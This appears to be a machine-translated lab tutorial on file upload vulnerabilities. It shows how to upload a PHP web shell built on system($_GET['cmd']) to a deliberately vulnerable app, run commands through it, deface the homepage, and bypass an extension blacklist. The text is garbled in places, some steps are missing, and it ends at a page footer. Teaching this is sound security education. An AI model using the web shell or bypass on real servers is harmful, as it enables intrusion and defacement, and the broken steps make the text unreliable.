File upload vulnerability instance analysis

Principles of file Upload vulnerability instance analysis

File upload is a common feature in Web applications. it allows users to upload files to the server and save them to a specific location. This is a very sensitive issue for security. Once a malicious program is uploaded to the server and the execution permission is obtained, the consequences will be unimaginable. Therefore, most Web applications have many restrictions on the file upload function. The file Upload vulnerability allows an attacker to bypass the system's file verification and processing policies by exploiting program defects to upload malicious programs to the server and obtain the ability to execute server commands. This attack method is direct and effective, and there is no threshold for dealing with some fragile systems.

Common methods to exploit the file upload vulnerability include:

Upload the Web script program. The Web container interprets and executes the malicious script for upload.

Upload the Flash cross-domain policy file crossdomain. xml and modify the access permission (the usage of other policy files is similar ).

Upload viruses and Trojan files to trick users and administrators into downloading and executing them.

Upload images containing scripts. some low-level versions of browsers execute the script for phishing and fraud.

In general, the uploaded files can either be executable (malicious programs) or have the ability to affect server behavior (configuration files ). the following conditions must be met for an attack:

Files can be filtered and processed through the front-end and back-end.

The file content will not be changed and can be properly stored

The storage location is within the control range of the Web container

Attackers have the permission to access the storage directory.

We use experiments to demonstrate method 1, which includes the following materials:

Regist folder (eb applications with vulnerabilities)

Hacker. php (malicious scripts to be uploaded)

Hacked.html (new homepage to be replaced by a black page)

Run the following command to download the experiment materials to any Directory of the VM and decompress it.

Wget http://labfile.oss.aliyuncs.com/courses/443/stuffs.tar.gztar-xzf stuffs.tar.gz cd stuffs

1. deploy web applications

Copy the regist folder to the/var/www/html/directory.

Sudo cp-R regist/var/www/html/

The directory structure of the regist folder is as follows:

Index.html (front-end registration page)

Regist. php (background registration handler)

Upload/(file upload directory)

Css/(style file directory)

Fonts/(font file directory)

Js/(script file directory)

Modify directory permissions:

Sudo chmod 777/var/www/html/regist-R start Apache2 service

Sudo service apache2 start

2. Upload malicious scripts

Token)

3. access the script program

The directory structure shows that the uploaded files are stored in the upload/directory. you can enter http: // localhost/regist/upload/hacker in the address bar of your browser. php

The source code of hacker. php is as follows:

Cmd:

Result:

In fact, you can write any code you like in the script file, as long as it is properly constructed and can be smoothly executed.

Core code system ($ _ GET ['cmd']); call the php system function system to execute linux system commands. obtain the command from the cmd parameter in the GET request. this means that we can execute any linux command with the current user permission, just like operating a local computer. first, test whether the malicious program runs normally:

Http: // localhost/regist/upload/hacker. php? Cmd = whoami

Renewal page to replace the website homepage:

Http: // localhost/regist/upload/hacker. php? Cmd = mv hacked.html ../index.html

Access the Web application localhost/regist again, refresh the page, and find that the replacement is successful. the page displays "You Are Hacked ".

Upload hacked.html to the/upload directory.

Thoughts and extensions

1. type check

In the experiment step, the front-end part of the website does not effectively filter and process file uploads. the famous vulnerabilities of the same kind include the FCKEditor file Upload vulnerability. FCKEditor is a very popular rich text editor, a php version has a file Upload type check vulnerability. the related code is as follows:

$ Config ['allowdextension'] ['file'] = array (); // supported Upload types $ Config ['denedextension'] ['file'] = array ('php', 'php3 ', 'php5', 'phtml ', 'asp ', 'aspx', 'ascx', 'JSP ', 'cfm', 'cfc', 'Pl', 'Pl ', 'bat', 'exe ', 'dll ', 'Reg', 'CGI '); // indicates the upload prohibited type.

As you can see, the code checks the file type, but uses the blacklist method. Therefore, if we use php2, inc, and other types of names, we can use the type check. in addition, for front-end verification, you can usually modify or forge a POST packet to bypass it.

2. permission requirements in order to achieve the attack effect, the experiment steps simplify some complex details. some key steps involve operation permissions. the required permissions for the steps are as follows:

Step or operation permission requirements

[1] [2] Next page